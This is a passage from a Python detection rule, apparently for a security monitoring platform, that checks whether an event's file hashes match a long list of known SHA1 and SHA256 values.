            "SHA1=01cf1fe3937fb6585ffb468b116a3af8ddf9ef16" in event.deep_get("Hashes", default=""),
            "SHA1=98c4406fede34c3704afd8cf536ec20d93df9a10" in event.deep_get("Hashes", default=""),
            "SHA1=1048f641adf3988d882a159bf1332eeb6d6a7f09" in event.deep_get("Hashes", default=""),
            "SHA1=867652e062eb6bd1b9fc29e74dea3edd611ef40c" in event.deep_get("Hashes", default=""),
            "SHA1=78fd06c82d3ba765c38bad8f48d1821a06280e39" in event.deep_get("Hashes", default=""),
            "SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c" in event.deep_get("Hashes", default=""),
            "SHA1=fdbcebb6cafda927d384d7be2e8063a4377d884f" in event.deep_get("Hashes", default=""),
            "SHA1=994dc79255aeb662a672a1814280de73d405617a" in event.deep_get("Hashes", default=""),
            "SHA1=6abc7979ba044f31884517827afb7b4bdaa0dcc1" in event.deep_get("Hashes", default=""),
            "SHA1=1768f9c780fe7cf66928cfceaef8ed7d985e18f5" in event.deep_get("Hashes", default=""),
            "SHA1=5fa527e679d25a15ecc913ce6a8d0218e2ff174b" in event.deep_get("Hashes", default=""),
            "SHA1=f11188c540eada726766e0b0b2f9dd3ae2679c61" in event.deep_get("Hashes", default=""),
            "SHA1=8416ee8fd88c3d069fbba90e959507c69a0ee3e9" in event.deep_get("Hashes", default=""),
            "SHA1=ab4399647ebd16c02728c702534a30eb0b7ccbe7" in event.deep_get("Hashes", default=""),
            "SHA1=98588b1d1b63747fa6ee406983bf50ad48a2208b" in event.deep_get("Hashes", default=""),
            "SHA1=86e6669dbbce8228e94b2a9f86efdf528f0714fd" in event.deep_get("Hashes", default=""),
            "SHA1=c9e9198d52d94771cb14711a5f6aaf8d82b602a2" in event.deep_get("Hashes", default=""),
            "SHA1=17fa047c1f979b180644906fe9265f21af5b0509" in event.deep_get("Hashes", default=""),
            "SHA1=1b526cbcba09b8d663e82004cf24ef44343030d3" in event.deep_get("Hashes", default=""),
            "SHA1=4e0f5576804dab14abb29a29edb9616a1dbe280a" in event.deep_get("Hashes", default=""),
            "SHA1=eb76de59ebc5b2258cff0567577ff8c9d0042048" in event.deep_get("Hashes", default=""),
            "SHA1=d4f5323da704ff2f25d6b97f38763c147f2a0e6f" in event.deep_get("Hashes", default=""),
            "SHA1=6802e2d2d4e6ee38aa513dafd6840e864310513b" in event.deep_get("Hashes", default=""),
            "SHA1=ac18c7847c32957abe8155bcbe71c1f35753b527" in event.deep_get("Hashes", default=""),
            "SHA1=beed6fb6a96996e9b016fa7f2cf7702a49c8f130" in event.deep_get("Hashes", default=""),
            "SHA1=7d453dccb25bf36c411c92e2744c24f9b801225d" in event.deep_get("Hashes", default=""),
            "SHA1=9648ad90ec683c63cc02a99111a002f9b00478d1" in event.deep_get("Hashes", default=""),
            "SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a" in event.deep_get("Hashes", default=""),
            "SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08" in event.deep_get("Hashes", default=""),
            "SHA1=fde0fff1c3e4c053148748504d4b9e0cc97f37ec" in event.deep_get("Hashes", default=""),
            "SHA1=73bac306292b4e9107147db94d0d836fdb071e33" in event.deep_get("Hashes", default=""),
            "SHA1=9382981b05b1fb950245313992444bfa0db5f881" in event.deep_get("Hashes", default=""),
            "SHA1=acb8e45ebd1252313ece94198df47edf9294e7d3" in event.deep_get("Hashes", default=""),
            "SHA1=9c36600c2640007d3410dea8017573a113374873" in event.deep_get("Hashes", default=""),
            "SHA1=53f776d9a183c42b93960b270dddeafba74eb3fb" in event.deep_get("Hashes", default=""),
            "SHA1=1fdb2474908bdd2ee1e9bd3f224626f9361caab7" in event.deep_get("Hashes", default=""),
            "SHA1=3533d0a54c7ccd83afd6be24f6582b30e4ca0aab" in event.deep_get("Hashes", default=""),
            "SHA1=cb25a5125fb353496b59b910263209f273f3552d" in event.deep_get("Hashes", default=""),
            "SHA1=a5f1b56615bdaabf803219613f43671233f2001c" in event.deep_get("Hashes", default=""),
            "SHA1=6c7663de88a0fba1f63a984f926c6ef449059e38" in event.deep_get("Hashes", default=""),
            "SHA1=e514dfadbeb4d2305988c3281bf105d252dee3a7" in event.deep_get("Hashes", default=""),
            "SHA1=632c80a3c95cf589b03812539dea59594eaefae0" in event.deep_get("Hashes", default=""),
            "SHA1=e6966e360038be3b9d8c9b2582eba4e263796084" in event.deep_get("Hashes", default=""),
            "SHA1=675cc00de7c1ef508ccd0c91770c82342c0ad4ab" in event.deep_get("Hashes", default=""),
            "SHA1=6ae26bde7ec27bd0fa971de6c7500eee34ee9b51" in event.deep_get("Hashes", default=""),
            "SHA1=80e4808a7fe752cac444676dbbee174367fa2083" in event.deep_get("Hashes", default=""),
            "SHA1=77b4f0c0b06e3dc2474d5e250b772dacaac14dd0" in event.deep_get("Hashes", default=""),
            "SHA1=7277d965b9de91b4d8ea5eb8ae7fa3899eef63a2" in event.deep_get("Hashes", default=""),
            "SHA1=3825ebb0b0664b5f0789371240f65231693be37d" in event.deep_get("Hashes", default=""),
            "SHA1=de9469a5d01fb84afd41d176f363a66e410d46da" in event.deep_get("Hashes", default=""),
            "SHA1=91568d7a82cc7677f6b13f11bea5c40cf12d281b" in event.deep_get("Hashes", default=""),
            "SHA1=4b882748faf2c6c360884c6812dd5bcbce75ebff" in event.deep_get("Hashes", default=""),
            "SHA1=599de57a5c05e27bb72c7b8a677e531d8e4bf8b5" in event.deep_get("Hashes", default=""),
            "SHA1=1d373361d3129d11bc43f9b6dfa81d06e5ca8358" in event.deep_get("Hashes", default=""),
            "SHA1=c5bd9f2b3a51ba0da08d7c84bab1f2d03a95e405" in event.deep_get("Hashes", default=""),
            "SHA1=89165bbb761d6742ac2a6f5efbffc80c17990bd8" in event.deep_get("Hashes", default=""),
            "SHA1=97812f334a077c40e8e642bb9872ac2c49ddb9a2" in event.deep_get("Hashes", default=""),
            "SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed" in event.deep_get("Hashes", default=""),
            "SHA1=37e6450c7cd6999d080da94b867ba23faa8c32fe" in event.deep_get("Hashes", default=""),
            "SHA1=9481cd590c69544c197b4ee055056302978a7191" in event.deep_get("Hashes", default=""),
            "SHA1=ff3e19cd461ddf67529a765cbec9cb81d84dc7da" in event.deep_get("Hashes", default=""),
            "SHA1=6972314b6d6b0109b9d0a951eb06041f531f589b" in event.deep_get("Hashes", default=""),
            "SHA1=dd94a2436994ac35db91e0ec9438b95e438d38c5" in event.deep_get("Hashes", default=""),
            "SHA1=dcc852461895311b56e3ae774c8e90782a79c0b4" in event.deep_get("Hashes", default=""),
            "SHA1=3489ed43bdd11ccbfc892baaeae8102ff7d22f25" in event.deep_get("Hashes", default=""),
            "SHA1=e38e1efd98cd8a3cdb327d386db8df79ea08dccc" in event.deep_get("Hashes", default=""),
            "SHA1=d4cf9296271a9c5c40b0fa34f69b6125c2d14457" in event.deep_get("Hashes", default=""),
            "SHA1=10fb4ba6b2585ea02e7afb53ff34bf184eeb1a5d" in event.deep_get("Hashes", default=""),
            "SHA1=f6793243ad20359d8be40d3accac168a15a327fb" in event.deep_get("Hashes", default=""),
            "SHA1=b34a012887ddab761b2298f882858fa1ff4d99f1" in event.deep_get("Hashes", default=""),
            "SHA1=71469dce9c2f38d0e0243a289f915131bf6dd2a8" in event.deep_get("Hashes", default=""),
            "SHA1=10115219e3595b93204c70eec6db3e68a93f3144" in event.deep_get("Hashes", default=""),
            "SHA1=161bae224cf184ed6c09c77fae866d42412c6d25" in event.deep_get("Hashes", default=""),
            "SHA1=07f78a47f447e4d8a72ad4bc6a26427b9577ec82" in event.deep_get("Hashes", default=""),
            "SHA1=2929de0b5b5e1ba1cce1908e9d800aa21f448b3d" in event.deep_get("Hashes", default=""),
            "SHA1=745335bcdf02fb42df7d890a24858e16094f48fd" in event.deep_get("Hashes", default=""),
            "SHA1=2a202830db58d5e942e4f6609228b14095ed2cab" in event.deep_get("Hashes", default=""),
            "SHA1=0167259abd9231c29bec32e6106ca93a13999f90" in event.deep_get("Hashes", default=""),
            "SHA1=c23eeb6f18f626ce1fd840227f351fa7543bb167" in event.deep_get("Hashes", default=""),
            "SHA1=613a9df389ad612a5187632d679da11d60f6046a" in event.deep_get("Hashes", default=""),
            "SHA1=1ce17c54c6884b0319d5aabbe7f96221f4838514" in event.deep_get("Hashes", default=""),
            "SHA1=025c4e1a9c58bf10be99f6562476b7a0166c6b86" in event.deep_get("Hashes", default=""),
            "SHA1=c3aafe8f67c6738489377031cb5a1197e99b202d" in event.deep_get("Hashes", default=""),
            "SHA1=50c6b3cafc35462009d02c10f2e79373936dd7bb" in event.deep_get("Hashes", default=""),
            "SHA1=6df35a0c2f6d7d39d24277137ea840078dafb812" in event.deep_get("Hashes", default=""),
            "SHA1=f92faed3ef92fa5bc88ebc1725221be5d7425528" in event.deep_get("Hashes", default=""),
            "SHA1=3bd1a88cc7dae701bc7085639e1c26ded3f8ccb3" in event.deep_get("Hashes", default=""),
            "SHA1=a3ed5cbfbc17b58243289f3cf575bf04be49591d" in event.deep_get("Hashes", default=""),
            "SHA1=552730553a1dea0290710465fb8189bdd0eaad42" in event.deep_get("Hashes", default=""),
            "SHA1=0291d0457acaf0fe8ed5c3137302390469ce8b35" in event.deep_get("Hashes", default=""),
            "SHA1=07f282db28771838d0e75d6618f70d76acfe6082" in event.deep_get("Hashes", default=""),
            "SHA1=e6765d8866cad6193df1507c18f31fa7f723ca3e" in event.deep_get("Hashes", default=""),
            "SHA1=22c9da04847c26188226c3a345e2126ef00aa19e" in event.deep_get("Hashes", default=""),
            "SHA1=43501832ce50ccaba2706be852813d51de5a900f" in event.deep_get("Hashes", default=""),
            "SHA1=cb3f30809b05cf02bc29d4a7796fb0650271e542" in event.deep_get("Hashes", default=""),
            "SHA1=ed86bb62893e6ffcdfd2ecae2dea77fdf6bf9bde" in event.deep_get("Hashes", default=""),
            "SHA1=3b6b35bca1b05fafbfc883a844df6d52af44ccdc" in event.deep_get("Hashes", default=""),
            "SHA1=928b5971a0f7525209d599e2ef15c31717047022" in event.deep_get("Hashes", default=""),
            "SHA1=b5696e2183d9387776820ef3afa388200f08f5a6" in event.deep_get("Hashes", default=""),
            "SHA1=ebd8b7e964b8c692eea4a8c406b9cd0be621ebe2" in event.deep_get("Hashes", default=""),
            "SHA1=fe18c58fbd0a83d67920e037d522c176704d2ca3" in event.deep_get("Hashes", default=""),
            "SHA1=9c1c9032aa1e33461f35dbf79b6f2d061bfc6774" in event.deep_get("Hashes", default=""),
            "SHA1=8e126f4f35e228fdd3aa78d533225db7122d8945" in event.deep_get("Hashes", default=""),
            "SHA1=064de88dbbea67c149e779aac05228e5405985c7" in event.deep_get("Hashes", default=""),
            "SHA1=30a80f560f18609c1123636a8a1a1ef567fa67a7" in event.deep_get("Hashes", default=""),
            "SHA1=98130128685c8640a8a8391cb4718e98dd8fe542" in event.deep_get("Hashes", default=""),
            "SHA1=a5914161f8a885702427cf75443fb08d28d904f0" in event.deep_get("Hashes", default=""),
            "SHA1=48f03a13b0f6d3d929a86514ce48a9352ffef5ad" in event.deep_get("Hashes", default=""),
            "SHA1=fff4f28287677caabc60c8ab36786c370226588d" in event.deep_get("Hashes", default=""),
            "SHA1=bb5b17cff0b9e15f1648b4136e95bd20d899aef5" in event.deep_get("Hashes", default=""),
            "SHA1=b2f5d3318aab69e6e0ca8da4a4733849e3f1cee2" in event.deep_get("Hashes", default=""),
            "SHA1=635a39ff5066e1ac7c1c5995d476d8c233966dda" in event.deep_get("Hashes", default=""),
            "SHA1=5ed22c0033aed380aa154e672e8db3a2d4c195c4" in event.deep_get("Hashes", default=""),
            "SHA1=87e20486e804bfff393cc9ad9659858e130402a2" in event.deep_get("Hashes", default=""),
            "SHA1=4dd86ff6f7180abebcb92e556a486abe7132754c" in event.deep_get("Hashes", default=""),
            "SHA1=39169c9b79502251ca2155c8f1cd7e63fd9a42e9" in event.deep_get("Hashes", default=""),
            "SHA1=7f7d144cc80129d0db3159ea5d4294c34b79b20a" in event.deep_get("Hashes", default=""),
            "SHA1=8692274681e8d10c26ddf2b993f31974b04f5bf0" in event.deep_get("Hashes", default=""),
            "SHA1=ea4a405445bb6e58c16b81f6d5d2c9a9edde419b" in event.deep_get("Hashes", default=""),
            "SHA1=da970a01cecff33a99c217a42297cec4d1fe66d6" in event.deep_get("Hashes", default=""),
            "SHA1=1f3799fed3cf43254fe30dcdfdb8dc02d82e662b" in event.deep_get("Hashes", default=""),
            "SHA1=3d2309f7c937bfcae86097d716a8ef66c1337a3c" in event.deep_get("Hashes", default=""),
            "SHA1=02a9314109e47c5ce52fa553ea57070bf0f8186a" in event.deep_get("Hashes", default=""),
            "SHA1=91f832f46e4c38ecc9335460d46f6f71352cffed" in event.deep_get("Hashes", default=""),
            "SHA1=76568d987f8603339b8d1958f76de2b957811f66" in event.deep_get("Hashes", default=""),
            "SHA1=e841c8494b715b27b33be6f800ca290628507aba" in event.deep_get("Hashes", default=""),
            "SHA1=b555aad38df7605985462f3899572931ee126259" in event.deep_get("Hashes", default=""),
            "SHA1=115edd175c346fd3fbc9f113ee5ccd03b5511ee1" in event.deep_get("Hashes", default=""),
            "SHA1=3d27013557b5e68e7212a2f78dfe60c5a2a46327" in event.deep_get("Hashes", default=""),
            "SHA1=bb6ef5518df35d9508673d5011138add8c30fc27" in event.deep_get("Hashes", default=""),
            "SHA1=9086e670e3a4518c0bcdf0da131748d4085ef42b" in event.deep_get("Hashes", default=""),
            "SHA1=f6728821eddd14a21a9536e0f138c6d71cbd9307" in event.deep_get("Hashes", default=""),
            "SHA1=34b677fba9dcab9a9016332b3332ce57f5796860" in event.deep_get("Hashes", default=""),
            "SHA1=a63e9ecdebaf4ef9c9ec3362ff110b8859cc396d" in event.deep_get("Hashes", default=""),
            "SHA1=8cd9df52b20b8f792ac53f57763dc147d7782b1e" in event.deep_get("Hashes", default=""),
            "SHA1=fcae2ea5990189f6f230b51e398e3000b71897f2" in event.deep_get("Hashes", default=""),
            "SHA1=27371f45f42383029c3c2e6d64a22e35dc772a72" in event.deep_get("Hashes", default=""),
            "SHA1=b6eb40ea52b47f03edb8f45e2e431b5f666df8c5" in event.deep_get("Hashes", default=""),
            "SHA1=9f27987c32321f8da099efc1dc60a73f8f629d3a" in event.deep_get("Hashes", default=""),
            "SHA1=40372b4de2db020ce2659e1de806d4338fd7ebef" in event.deep_get("Hashes", default=""),
            "SHA1=18693de1487c55e374b46a7728b5bf43300d4f69" in event.deep_get("Hashes", default=""),
            "SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98" in event.deep_get("Hashes", default=""),
            "SHA1=005754dab657ddc6dae28eee313ca2cc6a0c375c" in event.deep_get("Hashes", default=""),
            "SHA1=0bec69c1b22603e9a385495fbe94700ac36b28e5" in event.deep_get("Hashes", default=""),
            "SHA1=bd39ef9c758e2d9d6037e067fbb2c1f2ac7feac8" in event.deep_get("Hashes", default=""),
            "SHA1=23f562f8d5650b2fb92382d228013f2e36e35d6c" in event.deep_get("Hashes", default=""),
            "SHA1=a48aa80942fc8e0699f518de4fd6512e341d4196" in event.deep_get("Hashes", default=""),
            "SHA1=e42bd2f585c00a1d6557df405246081f89542d15" in event.deep_get("Hashes", default=""),
            "SHA1=bf5515fcf120c2548355d607cfd57e9b3e0af6e9" in event.deep_get("Hashes", default=""),
            "SHA1=89a74d0e9fd03129082c5b868f5ad62558ca34fd" in event.deep_get("Hashes", default=""),
            "SHA1=948368fe309652e8d88088d23e1df39e9c2b6649" in event.deep_get("Hashes", default=""),
            "SHA1=a14cd928c60495777629be283c1d5b8ebbab8c0d" in event.deep_get("Hashes", default=""),
            "SHA1=1f25f54e9b289f76604e81e98483309612c5a471" in event.deep_get("Hashes", default=""),
            "SHA1=25bf4e30a94df9b8f8ab900d1a43fd056d285c9d" in event.deep_get("Hashes", default=""),
            "SHA1=d1fb740210c1fa2a52f6748b0588ae77de590b9d" in event.deep_get("Hashes", default=""),
            "SHA1=dac68b8ee002d5bb61be3d59908a61a26efb7c09" in event.deep_get("Hashes", default=""),
            "SHA1=a56598e841ae694ac78c37bf4f8c09f9eaf3271f" in event.deep_get("Hashes", default=""),
            "SHA1=465abe9634c199a5f80f8a4f77ec3118c0d69652" in event.deep_get("Hashes", default=""),
            "SHA1=a0cefb5b55f7a7a145b549613e26b6805515a1ad" in event.deep_get("Hashes", default=""),
            "SHA1=36dca91fb4595de38418dffc3506dc78d7388c2c" in event.deep_get("Hashes", default=""),
            "SHA1=92138cfc14f9e2271f641547e031d5d63c6de19a" in event.deep_get("Hashes", default=""),
            "SHA1=fcf9978cf1af2e9b1e2eaf509513664dfcc1847b" in event.deep_get("Hashes", default=""),
            "SHA1=d02403f85be6f243054395a873b41ef8a17ea279" in event.deep_get("Hashes", default=""),
            "SHA1=4da007dd298723f920e194501bb49bab769dfb14" in event.deep_get("Hashes", default=""),
            "SHA1=85076aa3bffb40339021286b73d72dd5a8e4396a" in event.deep_get("Hashes", default=""),
            "SHA1=221717a48ee8e2d19470579c987674f661869e17" in event.deep_get("Hashes", default=""),
            "SHA1=a249278a668d4df30af9f5d67ebb7d2cd160beaa" in event.deep_get("Hashes", default=""),
            "SHA1=6b5aa51f4717d123a468e9e9d3d154e20ca39d56" in event.deep_get("Hashes", default=""),
            "SHA1=b5a8e2104d76dbb04cd9ffe86784113585822375" in event.deep_get("Hashes", default=""),
            "SHA1=02534b5b510d978bac823461a39f76b4f0ac5aa3" in event.deep_get("Hashes", default=""),
            "SHA1=538bb45f30035f39d41bd13818fe0c0061182cfe" in event.deep_get("Hashes", default=""),
            "SHA1=6d09d826581baa1817be6fbd44426db9b05f1909" in event.deep_get("Hashes", default=""),
            "SHA1=197811ec137e9916e6692fc5c28f6d6609ffc20e" in event.deep_get("Hashes", default=""),
            "SHA1=c3ca396b5af2064c6f7d05fa0fb697e68d0b9631" in event.deep_get("Hashes", default=""),
            "SHA1=cf9baf57e16b73d7a4a99dd0c092870deba1a997" in event.deep_get("Hashes", default=""),
            "SHA1=0320534df24a37a245a0b09679a5adb27018fb5f" in event.deep_get("Hashes", default=""),
            "SHA1=4c8349c6345c8d6101fb896ea0a74d0484c56df0" in event.deep_get("Hashes", default=""),
            "SHA1=9b2ef5f7429d62342163e001c7c13fb866dbe1ef" in event.deep_get("Hashes", default=""),
            "SHA1=6abbc3003c7aa69ce79cbbcd2e3210b07f21d202" in event.deep_get("Hashes", default=""),
            "SHA1=062457182ab08594c631a3f897aeb03c6097eb77" in event.deep_get("Hashes", default=""),
            "SHA1=947c76c8c8ba969797f56afd1fa1d1c4a1e3ed25" in event.deep_get("Hashes", default=""),
            "SHA1=d6de8211dba7074d92b5830618176a3eb8eb6670" in event.deep_get("Hashes", default=""),
            "SHA1=8302802b709ad242a81b939b6c90b3230e1a1f1e" in event.deep_get("Hashes", default=""),
            "SHA1=492e40b01a9a6cec593691db4838f20b3eaeacc5" in event.deep_get("Hashes", default=""),
            "SHA1=83506de48bd0c50ea00c9e889fe980f56e6c6e1b" in event.deep_get("Hashes", default=""),
            "SHA1=fe54a1acc5438883e5c1bba87b78bb7322e2c739" in event.deep_get("Hashes", default=""),
            "SHA1=020580278d74d0fe741b0f786d8dca7554359997" in event.deep_get("Hashes", default=""),
            "SHA1=3c1c3f5f5081127229ba0019fbf0efc2a9c1d677" in event.deep_get("Hashes", default=""),
            "SHA1=e2d98e0e178880f10434059096f936b2c06ed8f4" in event.deep_get("Hashes", default=""),
            "SHA1=03506a2f87d1523e844fba22e7617ab2a218b4b7" in event.deep_get("Hashes", default=""),
            "SHA1=fee00dde8080c278a4c4a6d85a5601edc85a1b3d" in event.deep_get("Hashes", default=""),
            "SHA1=ba430f3c77e58a4dc1a9a9619457d1c45a19617f" in event.deep_get("Hashes", default=""),
            "SHA1=c257aa4094539719a3c7b7950598ef872dbf9518" in event.deep_get("Hashes", default=""),
            "SHA1=bc62fe2b38008f154fc9ea65d851947581b52f49" in event.deep_get("Hashes", default=""),
            "SHA1=fe237869b2b496deb52c0bc718ada47b36fc052e" in event.deep_get("Hashes", default=""),
            "SHA1=0a62c574603158d2d0c3be2a43c6bb0074ed297c" in event.deep_get("Hashes", default=""),
            "SHA1=86f34eaea117f629297218a4d196b5729e72d7b9" in event.deep_get("Hashes", default=""),
            "SHA1=e0b263f2d9c08f27c6edf5a25aa67a65c88692b0" in event.deep_get("Hashes", default=""),
            "SHA256=9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7"
            in event.deep_get("Hashes", default=""),
            "SHA256=06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8"
            in event.deep_get("Hashes", default=""),
            "SHA256=822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb"
            in event.deep_get("Hashes", default=""),
            "SHA256=082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a"
            in event.deep_get("Hashes", default=""),
            "SHA256=618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb"
            in event.deep_get("Hashes", default=""),
            "SHA256=5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d"
            in event.deep_get("Hashes", default=""),
            "SHA256=82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2"
            in event.deep_get("Hashes", default=""),
            "SHA256=29d765e29d2f06eb511ee88b2e514c9df1a9020a768ddd3d2278d9045e9cdb4a"
            in event.deep_get("Hashes", default=""),
            "SHA256=f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212"
            in event.deep_get("Hashes", default=""),
            "SHA256=beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b"
            in event.deep_get("Hashes", default=""),
            "SHA256=9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac"
            in event.deep_get("Hashes", default=""),
            "SHA256=f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1"
            in event.deep_get("Hashes", default=""),
            "SHA256=50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76"
            in event.deep_get("Hashes", default=""),
            "SHA256=6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421"
            in event.deep_get("Hashes", default=""),
            "SHA256=575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316"
            in event.deep_get("Hashes", default=""),
            "SHA256=26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47"
            in event.deep_get("Hashes", default=""),
            "SHA256=b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03"
            in event.deep_get("Hashes", default=""),
            "SHA256=b8807e365be2813b7eccd2e4c49afb0d1e131086715638b7a6307cd7d7e9556c"
            in event.deep_get("Hashes", default=""),
            "SHA256=28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553"
            in event.deep_get("Hashes", default=""),
            "SHA256=9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87"
            in event.deep_get("Hashes", default=""),
            "SHA256=8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330"
            in event.deep_get("Hashes", default=""),
            "SHA256=a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852"
            in event.deep_get("Hashes", default=""),
            "SHA256=2c14bea0d85c9cad5c5f5c8d0e5442f6deb9e93fe3ad8ea5e8e147821c6f9304"
            in event.deep_get("Hashes", default=""),
            "SHA256=23e89fd30a1c7db37f3ea81b779ce9acf8a4294397cbb54cff350d54afcfd931"
            in event.deep_get("Hashes", default=""),
            "SHA256=f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d"
            in event.deep_get("Hashes", default=""),
            "SHA256=b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c"
            in event.deep_get("Hashes", default=""),
            "SHA256=897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736"
            in event.deep_get("Hashes", default=""),
            "SHA256=497a836693be1b330993e2be64f6c71bf290c127faca1c056abd0dc374654830"
            in event.deep_get("Hashes", default=""),
            "SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104"
            in event.deep_get("Hashes", default=""),
            "SHA256=f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a"
            in event.deep_get("Hashes", default=""),
            "SHA256=40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a"
            in event.deep_get("Hashes", default=""),
            "SHA256=ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a"
            in event.deep_get("Hashes", default=""),
            "SHA256=12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0"
            in event.deep_get("Hashes", default=""),
            "SHA256=9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392"
            in event.deep_get("Hashes", default=""),
            "SHA256=ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd"
            in event.deep_get("Hashes", default=""),
            "SHA256=da70fa44290f949e9b3e0fcfe0503de46e82e0472e8e3c360da3fd2bfa364eee"
            in event.deep_get("Hashes", default=""),
            "SHA256=accb1a6604efb1b3ce9345c9fd62fe717a84c3e089e09c638e461df89193ef01"
            in event.deep_get("Hashes", default=""),
            "SHA256=083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254"
            in event.deep_get("Hashes", default=""),
            "SHA256=c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231"
            in event.deep_get("Hashes", default=""),
            "SHA256=0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39"
            in event.deep_get("Hashes", default=""),
            "SHA256=32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d"
            in event.deep_get("Hashes", default=""),
            "SHA256=3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1"
            in event.deep_get("Hashes", default=""),
            "SHA256=f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae"
            in event.deep_get("Hashes", default=""),
            "SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4"
            in event.deep_get("Hashes", default=""),
            "SHA256=8922be14c657e603179f1dd94dc32de7c99d2268ac92d429c4fdda7396c32e50"
            in event.deep_get("Hashes", default=""),
            "SHA256=aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9"
            in event.deep_get("Hashes", default=""),
            "SHA256=087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212"
            in event.deep_get("Hashes", default=""),
            "SHA256=008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25"
            in event.deep_get("Hashes", default=""),
            "SHA256=b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09"
            in event.deep_get("Hashes", default=""),
            "SHA256=dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1"
            in event.deep_get("Hashes", default=""),
            "SHA256=0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99"
            in event.deep_get("Hashes", default=""),
            "SHA256=5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae"
            in event.deep_get("Hashes", default=""),
            "SHA256=36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475"
            in event.deep_get("Hashes", default=""),
            "SHA256=30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2"
            in event.deep_get("Hashes", default=""),
            "SHA256=15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c"
            in event.deep_get("Hashes", default=""),
            "SHA256=be70be9d84ae14ea1fa5ec68e2a61f6acfe576d965fe51c6bac78fba01a744fb"
            in event.deep_get("Hashes", default=""),
            "SHA256=7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db"
            in event.deep_get("Hashes", default=""),
            "SHA256=85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2"
            in event.deep_get("Hashes", default=""),
            "SHA256=749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c"
            in event.deep_get("Hashes", default=""),
            "SHA256=4999541c47abd4a7f2a002c180ae8d31c19804ce538b85870b8db53d3652862b"
            in event.deep_get("Hashes", default=""),
            "SHA256=56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c"
            in event.deep_get("Hashes", default=""),
            "SHA256=e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217"
            in event.deep_get("Hashes", default=""),
            "SHA256=0f58e09651d48d2b1bcec7b9f7bb85a2d1a7b65f7a51db281fe0c4f058a48597"
            in event.deep_get("Hashes", default=""),
            "SHA256=cf9451c9ccc5509b9912965f79c2b95eb89d805b2a186d7521d3a262cf5a7a37"
            in event.deep_get("Hashes", default=""),
            "SHA256=2456a7921fa8ab7b9779e5665e6b42fccc019feb9e49a9a28a33ec0a4bb323c4"
            in event.deep_get("Hashes", default=""),
            "SHA256=7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376"
            in event.deep_get("Hashes", default=""),
            "SHA256=eab9b5b7e5fab1c2d7d44cd28f13ae8bb083d9362d2b930d43354a3dfd38e05a"
            in event.deep_get("Hashes", default=""),
